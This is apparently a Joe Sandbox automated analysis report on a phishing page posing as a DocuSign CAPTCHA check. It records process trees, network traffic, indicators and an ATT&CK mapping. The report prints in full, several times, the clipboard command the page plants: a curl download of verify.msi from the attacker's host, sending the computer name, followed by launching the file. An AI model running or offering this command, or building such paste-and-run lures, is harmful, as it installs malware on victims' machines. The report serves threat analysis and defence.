Edit tour

Windows Analysis Report
https://account.esign.us.com/documentWizard.html?Uv=4WaUN2Pkric74yNetF

Overview

General Information

Sample URL:	https://account.esign.us.com/documentWizard.html?Uv=4WaUN2Pkric74yNetF
Analysis ID:	1645433
Infos:

Detection

Score:	64
Range:	0 - 100
Confidence:	100%

Signatures

AI detected phishing page

Detect drive by download via clipboard copy & paste

AI detected landing page (webpage, office document or email)

HTML page adds supicious text to clipboard

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Deletes files inside the Windows folder

HTML body contains low number of good links

HTML body with high number of large embedded background images detected

HTML title does not match URL

Invalid T&C link found

Sample execution stops while process was sleeping (likely an evasion)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Process Tree

System is w10x64

chrome.exe (PID: 1540 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: E81F54E6C1129887AEA47E7D092680BF)

chrome.exe (PID: 4564 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1768,i,13563723301119555575,7756311842140240896,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2148 /prefetch:3 MD5: E81F54E6C1129887AEA47E7D092680BF)

chrome.exe (PID: 6392 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://account.esign.us.com/documentWizard.html?Uv=4WaUN2Pkric74yNetF" MD5: E81F54E6C1129887AEA47E7D092680BF)

cmd.exe (PID: 4328 cmdline: cmd /K cmd.exe /c curl.exe -s https://account.esign.us.com/user-verify -H "x-system-id: %computername%" -o %userprofile%\verify.msi && start %userprofile%\verify.msi && echo CAPTCHA Code: 033561 && pause && rem DocuSign CAPTCHA Verification Tool (ver. 2025.1022) MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 6964 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 6912 cmdline: cmd.exe /c curl.exe -s https://account.esign.us.com/user-verify -H "x-system-id: user-PC" -o C:\Users\user\verify.msi MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

curl.exe (PID: 6452 cmdline: curl.exe -s https://account.esign.us.com/user-verify -H "x-system-id: user-PC" -o C:\Users\user\verify.msi MD5: 44E5BAEEE864F1E9EDBE3986246AB37A)

cleanup

Joe Sandbox Signatures

• Phishing
• Networking
• System Summary
• Persistence and Installation Behavior
• Malware Analysis System Evasion
• HIPS / PFW / Operating System Protection Evasion

Click to jump to signature section

Show All Signature Results

Phishing

AI detected phishing page

Source: https://account.esign.us.com/documentWizard.html?Uv=4WaUN2Pkric74yNetF	Joe Sandbox AI: Score: 9 Reasons: The brand 'Docusign' is well-known and typically associated with the domain 'docusign.com'., The URL 'account.esign.us.com' does not match the legitimate domain 'docusign.com'., The domain 'esign.us.com' is suspicious as it does not directly relate to 'Docusign' and uses a generic domain structure., The presence of 'account' as a subdomain could be an attempt to mimic legitimate login pages., The use of 'us.com' as a domain extension is unusual for a well-known brand like Docusign, which typically uses '.com'. DOM: 0.0.pages.csv
Source: https://account.esign.us.com/documentWizard.html?Uv=4WaUN2Pkric74yNetF	Joe Sandbox AI: Score: 9 Reasons: The brand 'Docusign' is well-known and typically associated with the domain 'docusign.com'., The URL 'account.esign.us.com' does not match the legitimate domain 'docusign.com'., The domain 'esign.us.com' is suspicious as it does not directly relate to 'Docusign' and uses a generic domain structure., The presence of 'account' as a subdomain could be an attempt to mimic legitimate account-related pages., The use of a reCAPTCHA code input field is common in phishing sites to create a false sense of security. DOM: 0.1.pages.csv

AI detected landing page (webpage, office document or email)

Source: https://account.esign.us.com/documentWizard.html?Uv=4WaUN2Pkric74yNetF

Joe Sandbox AI: Page contains button: 'Submit Verification' Source: '0.1.pages.csv'

Source: https://account.esign.us.com/documentWizard.html?Uv=4WaUN2Pkric74yNetF

HTTP Parser: Number of links: 0

Source: https://account.esign.us.com/documentWizard.html?Uv=4WaUN2Pkric74yNetF

HTTP Parser: Total embedded background img size: 248747

Source: https://account.esign.us.com/documentWizard.html?Uv=4WaUN2Pkric74yNetF

HTTP Parser: Title: Docusign - Verification does not match URL

Source: https://account.esign.us.com/documentWizard.html?Uv=4WaUN2Pkric74yNetF	HTTP Parser: Invalid link: Privacy Policy
Source: https://account.esign.us.com/documentWizard.html?Uv=4WaUN2Pkric74yNetF	HTTP Parser: Invalid link: Terms of Service
Source: https://account.esign.us.com/documentWizard.html?Uv=4WaUN2Pkric74yNetF	HTTP Parser: Invalid link: Privacy Policy
Source: https://account.esign.us.com/documentWizard.html?Uv=4WaUN2Pkric74yNetF	HTTP Parser: Invalid link: Terms of Service

Source: https://account.esign.us.com/documentWizard.html?Uv=4WaUN2Pkric74yNetF	HTTP Parser: No <meta name="author".. found
Source: https://account.esign.us.com/documentWizard.html?Uv=4WaUN2Pkric74yNetF	HTTP Parser: No <meta name="author".. found

Source: https://account.esign.us.com/documentWizard.html?Uv=4WaUN2Pkric74yNetF	HTTP Parser: No <meta name="copyright".. found
Source: https://account.esign.us.com/documentWizard.html?Uv=4WaUN2Pkric74yNetF	HTTP Parser: No <meta name="copyright".. found

Source: global traffic	HTTP traffic detected: GET /documentWizard.html?Uv=4WaUN2Pkric74yNetF HTTP/1.1Host: account.esign.us.comConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /npm/sweetalert2@11.6.15/dist/sweetalert2.min.css HTTP/1.1Host: cdn.jsdelivr.netConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,/;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleSec-Fetch-Storage-Access: activeReferer: https://account.esign.us.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /npm/sweetalert2@11.6.15/dist/sweetalert2.min.js HTTP/1.1Host: cdn.jsdelivr.netConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://account.esign.us.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /intl/en_us/badges/static/images/badges/en_badge_web_generic.png HTTP/1.1Host: play.google.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8X-Client-Data: CO6MywE=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://account.esign.us.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9

Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: account.esign.us.com
Source: global traffic	DNS traffic detected: DNS query: cdn.jsdelivr.net
Source: global traffic	DNS traffic detected: DNS query: play.google.com
Source: global traffic	DNS traffic detected: DNS query: upload.wikimedia.org
Source: global traffic	DNS traffic detected: DNS query: google.com

Source: curl.exe, 00000011.00000002.2084776832.0000000000CE0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://account.esign.us.com/user-verify
Source: curl.exe, 00000011.00000002.2084776832.0000000000CE0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://account.esign.us.com/user-verify-Hx-system-id:
Source: curl.exe, 00000011.00000002.2084776832.0000000000CE8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://account.esign.us.com/user-verifys
Source: chromecache_67.3.dr	String found in binary or memory: https://cdn.jsdelivr.net/npm/sweetalert2
Source: chromecache_67.3.dr	String found in binary or memory: https://developer.apple.com/assets/elements/badges/download-on-the-app-store.svg
Source: chromecache_67.3.dr	String found in binary or memory: https://fonts.googleapis.com/css2?family=Inter:wght
Source: chromecache_67.3.dr	String found in binary or memory: https://fonts.googleapis.com/icon?family=Material
Source: chromecache_63.3.dr	String found in binary or memory: https://fonts.gstatic.com/s/inter/v18/UcCO3FwrK3iLTeHuS_nVMrMxCp50SjIw2boKoduKmMEVuI6fAZ9hiA.woff2)
Source: chromecache_63.3.dr	String found in binary or memory: https://fonts.gstatic.com/s/inter/v18/UcCO3FwrK3iLTeHuS_nVMrMxCp50SjIw2boKoduKmMEVuI6fAZBhiI2B.woff2
Source: chromecache_63.3.dr	String found in binary or memory: https://fonts.gstatic.com/s/inter/v18/UcCO3FwrK3iLTeHuS_nVMrMxCp50SjIw2boKoduKmMEVuI6fAZFhiI2B.woff2
Source: chromecache_63.3.dr	String found in binary or memory: https://fonts.gstatic.com/s/inter/v18/UcCO3FwrK3iLTeHuS_nVMrMxCp50SjIw2boKoduKmMEVuI6fAZJhiI2B.woff2
Source: chromecache_63.3.dr	String found in binary or memory: https://fonts.gstatic.com/s/inter/v18/UcCO3FwrK3iLTeHuS_nVMrMxCp50SjIw2boKoduKmMEVuI6fAZNhiI2B.woff2
Source: chromecache_63.3.dr	String found in binary or memory: https://fonts.gstatic.com/s/inter/v18/UcCO3FwrK3iLTeHuS_nVMrMxCp50SjIw2boKoduKmMEVuI6fAZthiI2B.woff2
Source: chromecache_63.3.dr	String found in binary or memory: https://fonts.gstatic.com/s/inter/v18/UcCO3FwrK3iLTeHuS_nVMrMxCp50SjIw2boKoduKmMEVuI6fAZxhiI2B.woff2
Source: chromecache_62.3.dr	String found in binary or memory: https://fonts.gstatic.com/s/materialicons/v143/flUhRq6tzZclQEJ-Vdg-IuiaDsNc.woff2)
Source: chromecache_67.3.dr	String found in binary or memory: https://play.google.com/intl/en_us/badges/static/images/badges/en_badge_web_generic.png
Source: chromecache_67.3.dr	String found in binary or memory: https://upload.wikimedia.org/wikipedia/commons/thumb/2/2b/Windows_logo_2012-Black.svg/25px-Windows_l
Source: chromecache_67.3.dr	String found in binary or memory: https://www.google.com
Source: chromecache_67.3.dr	String found in binary or memory: https://www.gstatic.com/recaptcha/api2/logo_48.png

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File created: C:\Windows\SystemTemp\scoped_dir1540_1298553543

Jump to behavior

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File deleted: C:\Windows\SystemTemp\scoped_dir1540_1298553543

Jump to behavior

Source: classification engine

Classification label: mal64.phis.win@29/27@18/7

Source: C:\Windows\SysWOW64\curl.exe

File created: C:\Users\user\verify.msi

Jump to behavior

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6964:120:WilError_03

Source: C:\Windows\SysWOW64\curl.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1768,i,13563723301119555575,7756311842140240896,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2148 /prefetch:3
Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://account.esign.us.com/documentWizard.html?Uv=4WaUN2Pkric74yNetF"
Source: unknown	Process created: C:\Windows\SysWOW64\cmd.exe cmd /K cmd.exe /c curl.exe -s https://account.esign.us.com/user-verify -H "x-system-id: %computername%" -o %userprofile%\verify.msi && start %userprofile%\verify.msi && echo CAPTCHA Code: 033561 && pause && rem DocuSign CAPTCHA Verification Tool (ver. 2025.1022)
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c curl.exe -s https://account.esign.us.com/user-verify -H "x-system-id: user-PC" -o C:\Users\user\verify.msi
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\curl.exe curl.exe -s https://account.esign.us.com/user-verify -H "x-system-id: user-PC" -o C:\Users\user\verify.msi
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1768,i,13563723301119555575,7756311842140240896,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2148 /prefetch:3	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /K cmd.exe /c curl.exe -s https://account.esign.us.com/user-verify -H "x-system-id: %computername%" -o %userprofile%\verify.msi && start %userprofile%\verify.msi && echo CAPTCHA Code: 033561 && pause && rem DocuSign CAPTCHA Verification Tool (ver. 2025.1022)	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c curl.exe -s https://account.esign.us.com/user-verify -H "x-system-id: user-PC" -o C:\Users\user\verify.msi	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\curl.exe curl.exe -s https://account.esign.us.com/user-verify -H "x-system-id: user-PC" -o C:\Users\user\verify.msi	Jump to behavior

Source: C:\Windows\SysWOW64\curl.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: ncryptsslp.dll	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Persistence and Installation Behavior

Detect drive by download via clipboard copy & paste

Source: Chrome DOM: 0.1

OCR Text: Join our live webinar with Deloitte on March 19 to discover how A is revolutionizing agreement management. > Sales 1-877420-2040 Search Support Access Documents Log In docusign Solutions Products Plans & Pricing Contact Sales Resources auy Now Try For Free Enter reCAPTCHA Code Verification Steps: 1. Press + R 2. Press CTRL + V 3. Press ENTER 4. Submit reCAPTCHA result code below Enter reCAPTCHA code Submit Verification

HTML page adds supicious text to clipboard

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

Clipboard modification: cmd.exe /c curl.exe -s https://account.esign.us.com/user-verify -H "x-system-id: %computername%" -o %userprofile%\verify.msi && start %userprofile%\verify.msi && echo CAPTCHA Code: 033561 && pause && rem DocuSign CAPTCHA Verification Tool (ver. 2025.

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: curl.exe, 00000011.00000002.2084776832.0000000000CE8000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c curl.exe -s https://account.esign.us.com/user-verify -H "x-system-id: user-PC" -o C:\Users\user\verify.msi			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\curl.exe curl.exe -s https://account.esign.us.com/user-verify -H "x-system-id: user-PC" -o C:\Users\user\verify.msi			Jump to behavior

Source: unknown

Process created: C:\Windows\SysWOW64\cmd.exe cmd /k cmd.exe /c curl.exe -s https://account.esign.us.com/user-verify -h "x-system-id: %computername%" -o %userprofile%\verify.msi && start %userprofile%\verify.msi && echo captcha code: 033561 && pause && rem docusign captcha verification tool (ver. 2025.1022)

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Command and Scripting Interpreter	3 Browser Extensions	11 Process Injection	11 Masquerading	OS Credential Dumping	1 Security Software Discovery	Remote Services	Data from Local System	2 Non-Application Layer Protocol	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 DLL Side-Loading	1 DLL Side-Loading	11 Process Injection	LSASS Memory	1 System Information Discovery	Remote Desktop Protocol	Data from Removable Media	2 Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	1 DLL Side-Loading	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Ingress Tool Transfer	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 File Deletion	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
https://account.esign.us.com/documentWizard.html?Uv=4WaUN2Pkric74yNetF	0%	Avira URL Cloud	safe

Source	Detection	Scanner	Label
https://account.esign.us.com/user-verify-Hx-system-id:	0%	Avira URL Cloud	safe
https://account.esign.us.com/user-verifys	0%	Avira URL Cloud	safe
https://account.esign.us.com/user-verify	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
jsdelivr.map.fastly.net	151.101.193.229	true	false	high
google.com	142.251.40.238	true	false	high
play.google.com	172.217.165.142	true	false	high
www.google.com	142.251.40.196	true	false	high
upload.wikimedia.org	208.80.154.240	true	false	high
account.esign.us.com	44.203.127.19	true	true	unknown
cdn.jsdelivr.net	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Reputation
https://cdn.jsdelivr.net/npm/sweetalert2@11.6.15/dist/sweetalert2.min.js	false	high
https://account.esign.us.com/documentWizard.html?Uv=4WaUN2Pkric74yNetF	true	unknown
https://play.google.com/intl/en_us/badges/static/images/badges/en_badge_web_generic.png	false	high
https://cdn.jsdelivr.net/npm/sweetalert2@11.6.15/dist/sweetalert2.min.css	false	high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://www.google.com	chromecache_67.3.dr	false		high
https://account.esign.us.com/user-verify-Hx-system-id:	curl.exe, 00000011.00000002.2084776832.0000000000CE0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://upload.wikimedia.org/wikipedia/commons/thumb/2/2b/Windows_logo_2012-Black.svg/25px-Windows_l	chromecache_67.3.dr	false		high
https://account.esign.us.com/user-verify	curl.exe, 00000011.00000002.2084776832.0000000000CE0000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://account.esign.us.com/user-verifys	curl.exe, 00000011.00000002.2084776832.0000000000CE8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cdn.jsdelivr.net/npm/sweetalert2	chromecache_67.3.dr	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
151.101.193.229	jsdelivr.map.fastly.net	United States	54113	FASTLYUS	false
208.80.154.240	upload.wikimedia.org	United States	14907	WIKIMEDIAUS	false
44.203.127.19	account.esign.us.com	United States	14618	AMAZON-AESUS	true
142.251.40.142	unknown	United States	15169	GOOGLEUS	false
142.251.40.196	www.google.com	United States	15169	GOOGLEUS	false
172.217.165.142	play.google.com	United States	15169	GOOGLEUS	false

Private

IP
127.0.0.1

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1645433
Start date and time:	2025-03-21 18:43:21 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 3m 22s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	browseurl.jbs
Sample URL:	https://account.esign.us.com/documentWizard.html?Uv=4WaUN2Pkric74yNetF
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	20
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal64.phis.win@29/27@18/7

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe, TextInputHost.exe
Excluded IPs from analysis (whitelisted): 142.251.40.131, 142.251.32.110, 142.250.80.110, 172.253.122.84, 142.250.80.78, 142.250.176.206, 142.251.40.106, 142.250.65.195, 17.253.97.202, 17.253.97.204, 142.250.72.99, 142.250.176.195, 17.253.3.139, 17.253.3.134, 199.232.214.172, 142.251.40.238, 142.250.80.42, 142.251.40.138, 172.217.165.138, 142.250.65.170, 142.251.40.234, 142.250.80.106, 142.251.40.202, 142.250.80.74, 142.250.64.106, 142.250.80.10, 142.251.40.170, 142.250.64.74, 142.250.176.202, 142.250.72.106, 142.251.41.10, 142.251.35.174, 142.250.65.238, 142.251.40.206, 199.232.210.172, 142.251.40.195, 142.250.65.163, 184.31.69.3, 192.168.2.6, 20.109.210.53
Excluded domains from analysis (whitelisted): fonts.googleapis.com, fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, slscr.update.microsoft.com, fonts.gstatic.com, ctldl.windowsupdate.com, clientservices.googleapis.com, developer.apple.com, fe3cr.delivery.mp.microsoft.com, developer-cdn.apple.com.akadns.net, clients2.google.com, edgedl.me.gvt1.com, redirector.gvt1.com, update.googleapis.com, clients.l.google.com, www.gstatic.com, world-gen.g.aaplimg.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenFile calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: https://account.esign.us.com/documentWizard.html?Uv=4WaUN2Pkric74yNetF

Simulations

Behavior and APIs

Time	Type	Description
18:44:42	Clipboard	Run: cmd.exe /c curl.exe -s https://account.esign.us.com/user-verify -H "x-system-id: %computername%" -o %userprofile%\verify.msi && start %userprofile%\verify.msi && echo CAPTCHA Code: 033561 && pause && rem DocuSign CAPTCHA Verification Tool (ver. 2025.1022)

Process:	C:\Windows\SysWOW64\curl.exe
File Type:	Composite Document File V2 Document, Can't read SAT
Category:	dropped
Size (bytes):	10055680
Entropy (8bit):	7.99703770777142
Encrypted:	true
SSDEEP:	196608:1wCYGozqoC3sktVQC6WGwW3YziyfzrvHWrHMJ/ZnznFE5xlNhsVm:1UDAvtCC6FlByfXvHWEZnzqZ
MD5:	F35E55AB0B13D00D1237F09D2BC603DD
SHA1:	D31368479E8E632DA929F2E385B6A31FFFA5B507
SHA-256:	4DF441E0A284601615217184DC64FCF9427E659F534FFA6228BBBA152CEA4274
SHA-512:	566B3C3733D396AC572A48A28059CC4FAF6169CBDEF82CA67A6A736C622D3C7988C395610D9CB4B087EB87978250ABA3707F1A0B32C258234E05591B715CA282
Malicious:	false
Reputation:	low
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	Web Open Font Format (Version 2), TrueType, length 24368, version 1.0
Category:	downloaded
Size (bytes):	24368
Entropy (8bit):	7.990776494170634
Encrypted:	true
SSDEEP:	384:dg3hlifU7dYMasNHvcIxoRqrYcyKRjpt2PJKYytsPLFOYYmHRlkaSsD:YqsdxxhcIxo8rPyKJpt6nyaPwtOR2aVD
MD5:	42B95430773B4A1DEDFCFDA8C03A1D4B
SHA1:	8581FACE3A3703B4807AA2440E5354EA55A6C4EE
SHA-256:	B0E7558F4710A1E255B93E3DEEFE3AEBB19F3BB41C150F685A74D3B1A1C79E87
SHA-512:	590E1E4DCA67CB9088844530EFF20725270421A6C521FC05CF09948DF81AB6DBB0A169F42B58B031AD888F0E7ED863A0221B9243BF2B502E805B82DDCCEE9573
Malicious:	false
Reputation:	low
URL:	https://fonts.gstatic.com/s/inter/v18/UcCO3FwrK3iLTeHuS_nVMrMxCp50SjIw2boKoduKmMEVuI6fAZ9hiA.woff2
